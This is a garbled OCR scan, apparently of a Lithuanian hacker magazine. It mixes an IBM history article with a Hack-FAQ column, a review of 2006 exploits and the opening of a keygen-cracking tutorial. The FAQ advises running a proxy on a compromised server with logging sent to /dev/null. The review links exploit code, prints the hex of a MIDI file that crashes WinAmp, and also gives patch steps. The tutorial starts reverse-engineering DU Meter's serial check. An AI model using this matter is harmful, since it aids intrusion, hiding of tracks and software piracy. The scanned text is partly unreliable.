veiksmus atliekanti mašina. Dėl 
vakuuminių vamzdelių, kurie iki 
tol buvo pagrinde naudojami 
radijo industrijoje, lyginant su an- 
kstesniais analogais, informacijos 
apdorojimo greitį pavyko padidinti 
tūkstančius kartų. 


Vatsonas viencje pirmųjų IBM gamyklų 


[1944] 1944 metais. po 6 metų tyrimų ir kūrimo, Harvardo univer- 
sitete buvo sukurtas penkias tonas sveriantis Mark I — pirmoji istorijoje 
mašina, galinti automatiškai atlikti sudėtingus skaičiavimus. 40-ųjų 
pabaigoje pasirodė miniskaičiuotuvų serija, kurie buvo naudojami 
dirbant su perfokortomis ir skirti naudoti kompiuterių centruose. 


[60] 60-aisiais metais pasaulyje buvo 8 pagrindiniai kompiuterių 
gamintojai: „Scientific Data Systems“, „Control Data Corporation", 
UNIVAC, „General Electric“, „Burroughs“, RCA ir „Honeywell“, iš 
kurių IBM buvo stambiausia ir įtakingiausia. Korporacijos sėkmė 
buvo tokia didelė, kad JAV 
vyriausybė pradėjo teisminį 
procesą dėl bandymo mo- 
nopolizuoti pirmaujančių 
technologinių gaminių rinką. 
Šis procesas truko labai ilgai 
ir baigėsi tik 1983 metais. 
Jis smarkiai paveikė kom- 
panijos darbo modelį. 


[1964] 60-aisiais pačiu 
svarbiausiu ir apskritai vienu 
revoliucingiausių IBM projek- 
tu korporacijos istorijoje tapo 


IBM prototipas System /360 modelyje (1964) 


1964 metais pristatytas „IBM System /360“ modelis. Pagrindinė 
jo koncepcija buvo suderinamumas, t.y. nuo šiol buvo įmanoma 
palengva didinti mašinos galingumą, pasenusias komplekto dalis 
pakeičiant naujomis. 


1964 

Šiuo metu daugeliui kompanijų reikėjo kompiuterinių sprendimų, 
tačiau labai dažnai tekdavo rinktis tarp pasenusios ir galingos, 0 
tai reiškia nepriimtinai brangios Įrangos. Dažniausiai potencialūs 
klientai paprasčiausiai atsisakydavo įsigyti kompiuterį. Suderina- 
mumo technologijos kūrimas IBM kainavo 5 milijardus dolerių 
(šiuolaikiniais mastais tai būtų 30 milijardų dolerių), kas šį tyrimo 
projektą padarė vienu brangiausių verslo istorijoje. Korporacija ant 
System /360 pastatė praktiškai viską ir neapsiriko — vėliau viskas 
atsipirko su kaupu. 


[1969] 1969 metais Tomas Vatsonas jaunesnysis padarė dar vieną 
revoliucingą pakeitimą — šį kartą įrangos pardavimų sistemoje. 
Jeigu anksčiau visi kompiuteriai ir PĮ buvo pateikiami kartu vienoje 
dėžutėje, tai dabar atsirado galimybė šiuos komponentus įsigyti 
atskirai. Šis sprendimas sukūrė naują rinką su milžiniška finansų 
apyvarta, o IBM joje užėmė lyderio pozicijas. 


2004 metais IBM gavo rekordinį patentų kiekį r s 
išradimams — 3248. Dabar kompanijos valdomų patentų kiek 
siekia 32 tūkstančius. 

[70] 


[70] Be kompiuterių kūrimo, IBM pradeda užkariauti naujas rin- 
kas. 

1970 metais korporacija pristatė „IBM Copier“ — fotokopijavimui 
skirtą mašiną. Po metų atsirado kalbos atpažinimo sistema, „Su- 
prantanti“ 5000 žodžių. IBM taip pat pradeda teikti naujas paslaugų 
rūšis, tokias, kaip visiškai saugus kreditinių kortelių kodavimas ir 
spausdinimas. 


[1971] Kai 1971 metais kosminis aparatas Apollo nusileido 
ant Mėnulio, visos kompiuterinės operacijos buvo atliekamos su 
IBM kompiuteriais. Kiek vėliau kosmines programas palaikantis 
mokslinis kompanijos padalinys už didelius nuopelnus ir indėlį į 
kosmoso tyrimą gavo NASA apdovanojimą. 


[IBM PC] 

IBM PC (5150 modelis) atsiradimas buvo kompanijos ban- 
dymas užkariauti namų kompiuterių rinką. Tuo metu šios 
rinkos lyderiais buvo „Apple II“ ir CP/M. IBM patikėjo savo 
12 geriausių inžinierių komandai, vadovaujamai Viljamo Lou, 
sukonstruoti modelį, kuris galėtų sėkmingai konkuruoti su 
šiomis platformomis. IBM 5150 kūrimas truko lygiai metus. 
Mokslininkai nusprendė pirmą kartą kompanijos istorijoje 
gamyboje panaudoti kitų gamintojų komplektuojančias dalis. 
Procesorius buvo užsakytas jaunoje kompanijoje „Intel“, 0 
operacinė sistema DOS — tuomet dar menkai žinomoje 
„Microsoft“. Autoriai taip pat protingai spėjo, kad su atvira 
architektūra, kuomet IBM AK galės kurti ir į rinką tiekti 
kitos kompanijos, mašina taps dar populiaresne, tačiau 
norėdami valdyti rinką ir visada pirmauti prieš konkurentus, 
jie nusprendė licencijuoti ROM BIOS. 


19) 
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[1973] 1973 metais korporacijos inžinieriai sukūrė diskinio bloko 
prototipą IBM 3340, kuris geriau žinomas kaip „vinčesteris“ 
(kietasis diskas). Jame naudojama technologija leido dvigubai 
padidinti duomenų įrašymo į diskus tankumą. Per kitus 20 metų 
ši technologija tapo standartine visiems kietiesiems diskams. 


[1979] Šiuo metu kompanijai vadovavo Frankas Keris, kuris jau 
ilgą laiką užėmė aukštas pareigas. Tomas Vatsonas ir toliau liko 
direktorių taryboje, tačiau 1979 metais jis persikėlė į Tarybų 
Sąjungą ir ten pristatinėjo IBM 


[Didžiosios investicijos] 

[1982] 80-aisiais IBM toliau tęsė 
rinkos užkariavimą, kurdama naujus 
kompiuterių modelius ir plėsdama 
atskirų komplektuojančių dalių gal- 
imybes. Nauja IBM perprasta sritimi 
tapo pramoninių robotų kūrimas. 
1982 metais išleidžiamos dvi pro- 
gramuojamos robotų sistemos: 7565 
ir 7535. 


[1985] Po to, kai 1985 metais ko- 
rporacijai pradėjo vadovauti Džonas 
Ekersas, IBM tapo viena stambiausių 
pasaulyje investuotojų į naujų 
technologijų kūrimą. Naujų idėjų ir 
projektų skatinimui buvo atidarytas vidinis 100 milijonų fondas (jo 
rėmuose gauti kūrybiški sprendimai kompanijai sutaupė 8 kartus 
daugiau). Be to, tyrimams skirtos priemonės leido įgyvendinti 
daugybę revoliucingų projektų fizikos, matematikos srityse bei 
praplėsti kompiuterių galimybes. 


eServer 
galingas IBM serveris 


[1986] Per keletą metų IBM tyrinėtojai ir inžinieriai gavo daugybę 
prestižinių mokslo premijų, įskaitant 4 Nobelio premijas, 0 1986 
metais Nobelio premija už naujo mikroskopinio paviršiaus fotogra- 
favimo būdo, kuomet matomi atskiri atomai, išradimą gavo Gerd 
Binnig ir Heinrich Rohrer. 


[1987] Po metų šį apdovanojimą už superlaidiškumo atradimą 
Keraminėse medžiagose aukštoje temperatūroje gavo Georg Bed- 
narz ir Alexander Mueller. 


Pagrindinis mokslinis IBM personalas dirba vename stambiausių 
pasaulio tyrimų centrų Research Triangle Park. Jis įsikūręs Šiaurės 
Karolinoje, jo teritorijoje yra daugiau nei 100 pastatų, kuriuose 
dirba apie 40 tūkstančių žmonių. Pagal atliekamų tyrimų kiekį RTP 


Silicio Šlėniu 


galima sulyginti 


[IBM šiandien] 

[1994] Besiplėtojant kompiuterių tinklams, IBM daug dėmesio 
pradėjo skirti tinklo aplikacijų ir įrenginių kūrimui. 1994 metais 
kompanija suformavo „IBM Global Network“ — naują padalinį, kuris 
užsiėmė stambiausio pasaulyje didelio pralaidumo tinklo kūrimu, 
skirtu vyriausybinėms ir komercinėms struktūroms apjungti. Jo 
klientais tapo daugiau nei 2 milijonai žmonių. 


[1994] 1994 metais įvyko PowerPC 604 pristatymas. Tai buvo 
pats galingiausias pasaulyje mikroprocesorius, galintis apdoroti 


IBM 5100 


pirmas pasaulyje nešiojamasis komputeris 
40 megabaitų informacijos per sekundę. 


Nešiojamųjų kompiuterių serijos ThinkPad pavė 


ieno kompanijos darbuotojo, kuris kartą išėjo pietau 


prigriebė knygutė viršelio bes 


think) 


pad) su ant 


1žraši Jis dirbo prie nedidelio 


renginio sukūrimo projekto, kuris vėliau (0 pav 


Pad 


[1997] 1997 metais IBM 
pademonstravo šiuolaikiniu 
kompiuterių galimybes, 
sukonstravusi Deep Biue 

mašiną, užprogramuotą 
žaisti šachmatais. Deep 
Blue laimėjo susitikimą su 
pasaulio čempionu Gariu 
Kasparovu. Tai sukėlė daug 
ginčų apie kompiuterių per- 
spektyvas Ir Jų stigebėjimų 


Kasparovas prieš Deep Blue -1997- 


priartėjimą prie žmogiškojo proto. 

Dešimtmečio pabaigoje IBM tampa kompiuterių serverių tiekėjų 
lyderiu. IBM serverius naudoja 9596 stambiausių pasaulio verslo 
kompanijų, o pačia populiariausia serverine mašina tapo IBM 
AS/400 (iš viso jų parduota 700 tūkstančių 150 pasaulio šalių). 


[2000] 2000 metais pasirodė nauja serverių serija IBM eS 
erver — tai naujos kartos serveris, paveldėjęs meinfreimų galią 
ir patikimumą. Tais pačiais metais IBM investavo didžiausią 


IBM 5150 buvo pristatytas 1981 metų rugpjūčio 11 dieną. Šis 
kompiuteris savyje įgyvendino visus technogykų reikalavimus ir 
svajones. Portatyvinis, lengvai perprantamas, praplečiamas, 
palyginus nebrangus (bazinės konfigūracijos kaina siekė 
1565$), jis buvo tiesiog pasmerktas sėkmei. Neilgai trukus 
po AK pasirodymo rinkoje kompanija „Compag Computer 
Corporation“ panaudojo reverse engineering'ą ir taip sukurpė 
savo programinį BIOS kodą bei pradėjo gaminti pirmąjį 5150 
kloną — Compag Portable. Tačiau IBM PC, kuris neturėjo 
daugialypės terpės galimybių, per 80-uosius taip ir nesugebėjo 
nurungti 8 bitų asmeninių kompiuterių. Tiesa, biuro programų 
(pavyzdžiui, VisiCalc) dėka jis tapo biuro kompiuteriu numeris" 
vienas pasaulyje. 


Tokie buvo pirmieli asmeniniai IBM kompiuteriai 


savo istorijoje sumą — 5 milijardus dolerių. Ji buvo skirta šalia 


Niujorko statomai labiausiai technologiškai aprūpintai pasaulyje 
mikroschemų gamyklai. 


[1975] 70-ieji tapo mikroprocesorinės revoliucijos pradžia. Be 
abejo, IBM neliko nuošaly ir pradeda savo produktuose aktyviai 
naudoti naująsias technologijas. 1975 metais pradedamas lais- 
vai pardavinėti IBM 5100 Portable Computer — vienas pirmųjų 
nešiojamųjų kompiuterių, kur visos komplekto dalys yra viename 
korpuse, Kasetinis įrenginys, 5 colių ekranas, nuosavas IBM 
procesorius, keli šimtai kilobaitų read-only atminties, kurioje 
saugojama sisteminė programinė įranga bei 64 Kb rašymui 
prieinamos atminties štai kokios buvo jo charakteristikos. 
Jis svėrė 25 kilogramus ir, priklausomai nuo komplektacijos, 
kainavo nuo 9 iki 20 tūkstančių dolerių. Nepaisant to, kad 
kompiuterių gamyboje tai buvo naujas žodis. IBM 5100 smarkiai 
paplito, Pagrinde tai sąlygojo didelė kaina Ir patogios sąsajos 
nebuvimas. 


[1981] Galų gale 1981 metais gimsta IBM PC. Nuo tada pra- 
sideda nauja kompiuterių era. 


[1984 Olympic] Tuo pačiu kom- 
panija aktyviai dalyvauja finan 
suojant valstybinį išsilavinimą, 
kur įvairioms stipendijoms ir 
kultūrinėms programoms skiria 
80 milijonų dolerių, o 1984 
metais ji tapo pagrindiniu 
Olimpinių žaidynių rėmėju. Tuo 
metu inžinieriai pristato naujus 
kompiuterių modelius. 


[1987] 1987 metais 
išleidžiamas galingesnis IBM 
AK modelis — PS/2. Per 6 
mėnesius pavyksta parduoti 
milijoną vienetų, kai tuo tarpu 
originaliam AK tam prireikė 28 
mėnesių. Populiarindama savo 


IBM AS/400 su IBM logotipu -1990- 


naująjį kūrinį, kompan- 
ija sukūrė operacinę 
sistemą OS/2, kuri 
vartotojams suteikė 
daugiaužduotiškumą, 
saugumą ir darbo su 
labai didelėmis pro- 
gramomis galimybę. 


[1993] 1993 metų 
sausio 19 dieną 
IBM anonsavo per 
praėjusius metus 
patirtus nuostolius, 
kurie siekė 5 mili- 
jardus dolerių. Tokių 
nuostolių JAV istorijoje 
dar nebuvo patyrusi 
nė viena kompanija. 
Dėl to buvo išsamiai 
peržiūrėta verslo or- 
ganizavimo sistema, 
po ko korporacija pakeitė savo prioritetus, pereidama nuo 
kompiuterių ir komplektuojančių dalių gamybos prie programinės 
įrangos kūrimo ir įvairių paslaugų bei konsultacijų teikimo. 


pagrindinis IBM pastatas Niujorke 


[1993] Tais pačiais metais IBM pristatė labai sėkmingą naujojo 
nešiojamojo kompiuterio ThinkPad modelį, kuriame pirma kartą 
naudojamas klaviatūros viduryje integruotas track-point'as 
Šis nešiojamasis kompiuteris iš karto tapo hitu ir Už savo 
unikalų dizainą bei kokybę pelnė daugiau ne! tris šimtus 
apdovanojimų. 


[Blue Gene] Kurdama tinklo produkcija ir programinę įrangą, 
IBM nepaliko rinkos, kuri visada užėmė lyderio pozicijas, t.y. 
superkompiuterių rinkos. Kompanijos pasididžiavimas yra 280,6 
Teraflopų galios iš 65536 mazgų sudarytas Blue Gene/L. Ši 
mašina našiausių pasaulio superkompiuterių sąraše užima pirmą 
vietą. Korporacija toliau augina galią, paskutiniame modelyje 
Blue Gene/O našumas pasieks 3 Petaflopus. 


[2005] 2005 metų vasarį IBM atskleidė savo bendro su „Sony“ 
ląstelinio mikroprocesoriaus, veikiančio remiantis vektoriniu 
duomenų apdorojimu, sukūrimo projekto detales. Pirmu šio 
mikroprocesoriaus pritaikymu tapo žaidimų priedas PlaySta- 
tion 3. 


Tarp IBM kompanijos sienų buvo sukurta daugybė šiandien 
plačiai taikomų technologijų, tokių, kaip kietasis diskas, lankstu- 
sis diskelis, kursorius, dinaminė atmintis, vaizdą įrašanti galvutė, 
RISC architektūra, USB flash drive ir daugelis kitų. 


XX amžiuje darbinė IBM darbuotojų 
apranga buvo mėlynas švarkas, balti 
marškiniai ir tamsus kaklaraištis. Tik 
1990 metais kompanija sušvelnino 
reikalavimus, todėl dabar čia apran- 
ga nesiskiria nuo kitose stambiose 
firmose dėvimų drabužių. 
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(O) Pradėjau rašyti nuosavą PHP varikliuką. Viskas 


normalu, tačiau keičiant kai kurių parametrų 

reikšmes skriptas smarkiai keikiasi. Tai gresia tik 
įdiegimo kelių parodymu, tačiau norėtysi, kad varikliukas 
veiktų idealiai. Ar galima kaip nors atjungti PHP klaidų 
kontrolę? 


Norint įjungti klaidų atvaizdavimą, php.ini byloje reikia 
surasti parametrą error reporting ir pakeisti jo reikšmę į 
E ALL. Funkcija error reporting nurodo klaidų atvaizdavi- 
mo lygį. Jeigu jai vietoje parametro nurodysi E ALL, tai 
bus atvaizduojami visi perspėjimai ir pranešimai. Norint klaidų 
pranešimus atjungti konkrečiame skripte, reikia jo pradžioje 
įrašyti štai tokią eilutę: error reporting(E ALL - (E NOTICE + 
E WARNING)); 
Jeigu reikia pakeisti viso serverio klaidų atvaizdavimo lygį, 
tuomet reikėtų paredaguoti php.ini byloje aprašytą to paties 
pavadinimo parametrą. Toje pačioje byloje taip pat galima 
surasti galimus lygių variantus. Tuo atveju, kai tau reikia, kad 
tam tikra funkcija neatvaizduotų klaidų, prieš jos pavadinimą 
reikia įterpti (D simbolį, pavyzdžiui, (Dfopen(). Noriu iš karto 
pasakyti, kad paruoštame varikliuke neturi būti jokių klaidų 
pranešimų, kadangi tai smarkiai supaprastina atakuojančiujų 
darbą. 


BŪK KONKRETUS IR UŽDAVINĖK 
KONKREČIUS KLAUSIMUS! PRIEŠ 
SIŲSDAMAS SAVO PROBLEMĄ | HACK-FAO, 
STENKIS JĄ KUO IŠSAMIAU APRAŠYTI. TIK 
TUOMET AŠ GALĖSIU IŠ TIESŲ TAU PADĖTI, 
ATSAKYTI BEI PARODYTI GALIMAS KLAIDAS. 
VENK BENDRINIŲ KLAUSIMU, PANAŠIŲ Į 
„KAIP NULAUŽTI INTERNETĄ?“ — TU TIK 
APKRAUSI SAVO IR MANO PAŠTO DĖŽUTES. 
IŠ MANĘS GRĘŽTI KO NORS UŽ DYKĄ (IN- 
TERNETO, SHELLŲ IR PANAŠIAI) NEVERTA, 
NES AŠ PATS GYVENU IŠ HUMANITARINĖS 
PAGALBOS! 


() Anonimiškumas internete man yra vienas 
svarbiausių klausimų. Bet po keleto atvejų, kai iš 


stambių socks serverių nutekėjo logai, aš pradėjau 
realiai būgštauti dėl savo saugumo. Vienas mano 
pažįstamas pasakė, kad tokiu atveju geriausias varian- 
tas — nulaužtame serveryje paleisti nuosavą proxy/vpn. 
Papasakok išsamiau. 


Kuo puikiausiai suprantu tavo būgštavimus. Pasitikėti 
galima tik savimi, todėl nuosavo socks proksio paleidi- 


mas -- iš tiesų geras variantas. Juo labiau, kad padaryti 

tai ne taip ir sunku. Tau reikės shello (pakaks net ir 
minimalių teisių) bei programinės įrangos. Rekomenduoju 
naudoti bouncer arba 3proxy. Pirmasis gali veikti šiose sis- 
temose: Windows, Linux ir FreeBSD. Bouncer nereikia kom- 
piliuoti — tai paruošta programa, kuri nereikalauja specialių 
privilegijų servenyje, išskyrus porto atidarymą, o visi paleidimo 
parametrai visiškai suprantami. Aš pats naudoju šią programą 
keliuose serveriuose ir esu ja patenkintas. 3proxy tu gali rasti 
security.nnov.ru svetainėje, kur saugoma ir dokumentacija. 
Šią programą reikia kompiliuoti ir ji turi pakankamai daug 
nustatymų. Logų įrašymą galima atjungti nurodžius, pavyzdžiui, 
/dev/null. 


Supports 
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[NT: nutolusi skylė DHCP servise] 


[Brief] 2006 m. liepos 11 dieną kom- 
panijos CYBSEC S. A. (cybsec.com) 
darbuotojas Mariano Nuuez Di Croce 
išpublikavo pranešimą apie buferio 
perpildymą Microsoft Windows DCHP 
kliente (pastarasis techniškai realizuotas 
kaip servisas), kuris suteikia nuotolinę 
kodo įvykdymo galimybę su SYSTEM 
teisėmis, su sąlyga, jog atakuojantysis 
ir auka yra viename potinklyje: www. 
cybsec.com/vuln/CYBSEC-Security Pre- 
Advisory Microsoft Windows DHCP Cli- 
ent Service Remote Buffer Overflow. 
pdf; „Microsoft“ tuojau pat sureagavo 
į šį pranešimą ir operatyviai išleido 
pataisymą kartu su TechNert'e pateikiamu 
problemos aprašymu: microsoft.com/ 
technet/security/Bulletin/MS06-036. 
mspx, kur pažeidžiamumui buvo priskirtas 
kritinis pavojingumo lygis. Analogiškai 
šį pažeidžiamumą įvertino ir prancūzų 
kompanija FrSIRT:frsirt.com/english/ 
advisories/2006/2754. 


[Targets] Pažeidžiamos šios sistemos: 
Windows 2000 Professional / Standard 
Server / Datacenter Server / Advanced 
Server; XP Tablet PC / Media Center / 
Home / Professional / Professional x64 
/ Datacenter Server / Advanced Server; 
Server 2003 Standard / Standard x64 / 
Web/ Enterprise / Enterprise x64 / Data- 
center/ Datacenter x64 su visais įdiegtais 
pataisymų paketais (Service Pack). NT ir 
9x sistemose ši grėsmė neplinta. 


[Exploits] Kompanija Cybsec S. A. neat- 
skleis techninių atakos detalių bei paties 
eksploito 30 dienų eigoje, po ko pateiks 
visą Šią informaciją viešai (šiuo metu ši 
Informacija jau turėtų būti prieinama). 


[Solution] a) įdiegti „Microsoft“ 
pataisymą, kurį galima parsisiųsti iš 
update.microsoft.com b) atjungti DHCP 
klientą per Control Panel -> Administra- 
tive Tools -> Services -> DHCP client -> 


Properties > Startup type -> Manual; 
Properties -> Stop; arba komandinėje 
eilutėje įvykdyk „sc stop DHCP -> sc 
config DHCP start=disabled“. Po visų šių 
veiksmų perkrauti kompiuterį nebūtina. 
Sustabdžius DHCP servisą visus loka- 
laus tinklo (IP adresų ir kt.) nustatymus 
teks konfigūruoti rankiniu būdu, ką 
lengva padaryti namie, tačiau kur kas 
sudėtingiau realizuoti korporatyviniame 
tinkle. Dinaminių IP adresų išskyrimo 
jungiantis per modemą (dial-up) DHCP 
serviso sustabdymas neturės jokios įtakos 
(išsamiau apie DHCP galima paskaityti 
IETF RFC 2131 dokumente — rfc.net/ 
rfc2131.html). 


[„MS Office“: gausūs buferio perpildymai] 
[Brief] 2006 m. birželį-liepą iš karto 
keletas nepriklausomų tyrėjų Microsoft 
Wora/Excel ir kitose MS Office dokumen- 
tus apdorojančiose programose aptiko 
daugybę buferio perpildymo klaidų, 
klastingiausią kurių 2006 m. liepos 10 
dieną pastebėjo hakeris slapyvardžiu 
naveed (naveedaifzaldgmail.com). Pas- 
taroji klaida susijusi su funkcija LsCre- 
ateLine, kuri eksportuojama iš mso.dll 
bibliotekos (senesnėse Office versijose 
šios bibliotekos byla vadinasi mso9.dll). 
Specialiai sukurta „doc byla sukelia Word 
lūžimą su priėjimo klaidos pranešimu, 
tačiau be to gali būti perrašytas laisvai 
pasirinktas dvigubas atminties žodis, 
leidžiantis po to atlikti valdymo perdavimą 
shellkodui: securityfocus.com/archive/1/ 
439649. Žinia greitai pasklido po visą 
internetą: security.nnov.ru/Gnews345. 
html; securityfocus.com/bid/18905, 
tačiau „Microsoft“ su tuo kategoriškai 
nesutiko ir savo Security Response 
Center Bloge išpublikavo paneigimą, 
kuriame sakoma, kad Word lūžta, tačiau 
valdymo perdavimo shellkodui galimybė 
ganai abejotina: blogs.technet.com/ 
msro/archive/2006/07/10/441006.aspx; 
aš pats po derinimo ir disasembliavimo 
laikausi naveed'o nuomonės. 


Taip pat čia buvo aptikta kreiva rodyklių 
į objektus realizacija, suteikianti shel- 
Ikodo įvykdymo galimybę (securityfocus. 
com/bid/18037). Jau atsirado pora virusu 
kirminu, kurie plinta panaudodami šią 
skylę: Backdoor.Ginwui (symantec.com/ 
avcenter/venc/data/backdoor.ginwui. html) 
ir Trojan.Mdropper.H (securityresponse. 
symantec.com/avcenter/venc/dataftrojan. 
mdropper.h.html). 

Klaidos aptiktos ir grafinių GIF ir PNG 
formato bylų apdorojime, kurios vėl gi 
sukelia shell-kodo įvykdymo galimybę 
(securityfocus.com/bid/18913 ir se- 
curityfocus.com/bid/18915). Objektų 
savybės (property) ir eilučių analizė 
(parsing) neatsilieka nuo savo bičiulių 
bei leidžia įvykdyti shellkodą ne blogiau 
už kitus (securityfocus.com/bid/18911 
ir securityfocus.com/bid/18912). Be 
dėmesio nelieka ir Excel — stilių ap- 
dorojime ir įrašų išskyrime aptikti de- 
fektai, suteikiantys shellkodo įvykdymo 
galimybę: securityfocus.com/bid/18872, 
securityfocus.com/bid/18422 ir securi- 
tyfocus.com/bid/18885. Klaidų mišką 
apvainikuoja hlink.dll bibliotekoje aptikta 
skylė — ši biblioteka atsako už skirtingu 
tipų įrašų stilių apdorojimą ir esant 
tam tikroms sąlygoms leidžia perduoti 
valdymą į kenksmingą kodą: security. 
nnov.ru/Gnews270.html. 


[Target] Visa MS Office produktų serija. 


[Exploits] securityfocus.com/dataAulner- 
abilities/exploits/MSOffice mosdll poc. 
Cc; 
downloads.securityfocus.com/vulnerabili- 
ties/exploits/excel-rce-nsrocket. txt; 
securityfocus.com/data/vulnerabilities/ex- 
ploits/Nanika.xls; 
bsapakistan.org/downloads/wordPOC.e; 


[Solution] Kai kurias iš aukščiau išvardintų 
skylių „Microsoft“ patvirtino, išleisti jas 
ištaisantys pataisymai: kai kurios skylės 
vis dar neužiopytos, todėl neatidarinėk iš 
nepatikimų šaltinių gautų dokumentų! 


[„WinAmp“: midi ir buferio perpildy- 
mas] 


[Brief] 2006 m. balandžio 19 dieną 
populiariausiame Null-soft kuriamame 
mp3 grotuve WinAmp buvo aptiktas 
defektas, slypintis bibliotekoje in midi. 
dll. kuri atsako už midi bylų atkūrimą 
ir kuri nekorektiškai tikrina kai kurių 
laukų užpildymo teisingumą. Dėl to 
atakuojantysis turi galimybę „nulaužti“ 
WinAmp (kuris tuo pačiu primygtinai 
siūlo perkrauti sistemą, nors jos galima 
ir neperkrovinėti) arba perduoti valdymą 
shelikodui. Žemiau pateikta 34 baitų 
midi byla be vargo WinAmp'ui nuneša 
stogą: 


midi byla, sukelianti „WinAmp“ 
lūžimą 

0000:4D 54 68 64 00 00 00 06 | 00 
00 00 01 00 60 4D 54 

0010:72 6B 00 00 00 FF FF FF | FF FF 
FF FF FF FF FF FF 

0020:FF 00 


Kadangi WinAmp gali būti sukonfigūruotas 
taip, kad vietoje pagrindinio sistem- 
inio grotuvo atkurti web puslapiu- 
ose pateikiamą midi turinį (daugelis 
vartotojų jį būtent taip ir konfigūruoja), 
eilinės virusų epidemijos grėsmė yra 
pakankamai didelė, ypač įvertinus tai, 
kad WinAmp'o, priešingai nei sistemą, 
niekas neatnaujina. Be to, pradinis 
klaidos pranešimas liko nepastebėtas 
net ir po to, kai jis buvo išpublikuotas 
pakartotinai — 2006 m. gegužės 
29 dieną — t.y. lygiai po mėnesio. Į 
SecurityFocus šis pranešimas pateko 
smarkiai (ir šiai svetainei nebūdingai) 
pavėlavęs — 2006 m. birželio 19 dieną 
(securityfocus.com/bid/18507). 


[Targets] Visos WinAmp versijos iki 
5.21 imtinai. 


[Exploit] securityfocus.com/data/vulner- 
abilities/exploits/winamp midi bof.c; 


[Solution] a) atnaujink savo WinAmp 
versiją iki 5.22 (arba naujesnės), kad 
pašalintum nesuderinamumą su ank- 
stesniais įskiepiais; 

b) nenaudok WinAmp midi bylų 
atkūrimui — tai gali padaryti nuimdamas 
atitinkamą varnėlę failų tipų asociaci- 
jose arba iš katalogo Plugins pašalinus 
bylą midi.dll 


[NT: nutolusi skylė TCP/IP 
tvarkyklėje] 


[Brief] 2006 m. birželio 13 dieną Micro- 
soft TechNet'e pasirodė pranešimas apie 
buferio perpildymą TCP/IP tvarkyklėje, 
kuris leidžia „užlaužti“ sistemą iki 
mėlynojo mirties ekrano ir net perduoti 
valdymą shellkodui, kuris bus vykdomas 
su SYSTEM teisėmis: microsoft.com/tech- 
net/security/Bulletin/MS06-032.mspx; 
pažeidžiamumui buvo priskirtas impor- 
tant pavojingumo lygis. Po poros valandų 
žinia apie pažeidžiamumą pasirodė www. 
securityfocus.com ir kitose hakeriškose 
svetainėse. 


[Targets] Pažeidžiamos šios sistemos: NT 
Workstation / Standard Server / Terminal 
Server / Enterprise Server: W2K Profes- 
sional / Standard Server/ Datacenter 
Server / Advanced Server; XP Tablet PC 
/ Media Center / Home / Professional / 
Professional x64/ Datacenter Server / 
Advanced Server; Server 2003 Standard 
/ Standard x64 / Web / Enterprise / En- 
terprise x64 / Datacenter / Datacenter 
x64 su visais įdiegtais pataisymų paketais 
(Semvice Pack). Kitaip tariant, pažeidžiama 
visa NT tipo sistemų šeima. Šis pavojus 
negresia 9x sistemoms. 


[Exploits] securityfocus.com/data/vulner- 
abilities/exploits/18374-D0S-PoC.c; 
securityfocus.com/data/vulnerabilities/ 
exploits/18374-D0S-POC.txt; 


[Solution] a) įdiegti „Microsoft“ pataisymą, 
kurį galima parsisiųsti iš update. microsoft. 
com b) atjungti IP Source Routing (IP 
maršrutizavimą pagal šaltinį), sukuriant 
DWORD tipo parametrą DisableIPSourceR- 
auting ir priskirti jam reikšmę 2, visa tai rei- 
kia padantti šioje sisteminio registro šakoj 
HKLM|SYSTEM Current Contro|Set|Servic- 
es|Tepip|Parameters, po ko reikia perkrauti 
kompiuterį. Beje, tai niekaip nepaveiks 
„Normalaus“ paketų maršrutizavimo; c) 
su ugniasiene užblokuoti IP paketus, kurių 
opcijos yra 131 (LSRR: Loose Saurce-n. 
Record Route — laisvas maršrutizavimas 
pagal šaltinio adresą įrašant maršrutą) ir 
137 (SSRR: Strict Source-n-Record Route 
— griežtas maršrutizavimas pagal šaltinio 
adresą įrašant maršrutą). Nepainiok šių 
opcijų su jungtimis — tai ne jungtys, 0 
būtent IP paketų opcijos. Deja, toli gražu 
ne visos asmeninės ugniasienės leidžia 
atlikti tokį lankstų filtravimą. 


EKSPLOITŲ APŽVALGA 


FERRUM 


026 


Ruošiam keygeną 
Registravimo raktų 
generavimo algoritmo paieška 


[Kaip paruošti bandomąjį triušį?] Tyrimų objektu aš 
pasirinkau ganėtinai žinomą programą DU Meter v.3.07 
build 200. Be jokios abejonės, tai reikalingas įrankis. 
Kam reikia skaičiuoti tinklo srautą, tas mane supras. 
Aš pats ja naudojuosi, rekomenduoju ir tau. Beje, 
šiai programai skirtą registravimo raktą tu susikursi 
savomis rankomis. = 

Iš pradžių žvilgtelėkime į registraciją. Čia reikia įvesti 
licencijavimo duomenis: vartotojo vardą ir serijos 
numerį. Aš įdomumo dėlei pabandžiau čia ką nors 
įvesti. Langelis apie neteisingą serijos numerį mane 
neapsakomai nudžiugino, o programa toliau veikė, 
todėl aš galėjau įvesti naują serijos numerį. Kodėl 
nudžiugino? Ogi todėl, kad vietoje perspėjimo apie 
neteisingą numerį buvo galima pamatyti užsidarančią 
programą, prašymą ją perleisti arba iš viso nieko 
nepamatyti ir tik spėlioti, ar tu iš pirmo karto 
atspėjai licencijavimo duomenis, ar ne. Be abejo, 
tai nepridėtų ypatingai daug papildomų problemų, 
tačiau kaip yra sakoma: tiesiog maloni smulkmena. 
Po to reikia nustatyti, su kokia programavimo kalba 
parašyta programa — tai labai svarbus niuansas, 
kadangi, pavyzdžiui, su VisualBasic parašytų ir dar 
su p-code sukompiliuotų programų nulaužimo me- 
todai iš esmės skiriasi nuo metodų, kurie naudojami 
su Delphi arba C++ sukurtai programai. Tuo pačiu 
mes patikrinsime, ar programoje panaudoti pakuotu- 
vai/protektoriai. Čia mums padės įrankis PEiD arba 
bet koks disasembleris. Nevertėtų ypatingai pasitikėti 
analizatorių sąžiningumu — tai reikia mokėti nustatyti 
pačiam. Nieko tokio, įgijus truputį patirties viskas 
eisis kaip sviestu patepta. O kol kas paleiskim PEiD 
ir pažiūrėkim jo pateiktą atsakymą — Borland Delphi 
6.0-7.0. Ką gi, šį kartą PEiD teisus — tai iš tiesų 
Delphi. Dar pažiūrėkime, ar kode naudojami krip- 
toalgoritmai. Čia mums vėl pagelbės PEiD, o tiksliau 
— jo įskiepis KANAL. Matome du CRC32 algoritmus, 
o konstantų lentelė generuojama programos vykdymo 
metu. Atsiminkime tai, kadangi vėliau šito prireiks. 
Dabar apsispręskime dėl naudojamų įrankių. Mums 
reikia disasemblerio. derintuvo, tekstų apdorojimo 
programos ir, be jokios abejonės, mokėti kurią nors 


SCENA HACK IMPLANT SOFTWARE 


UNIXOID 


CODING 


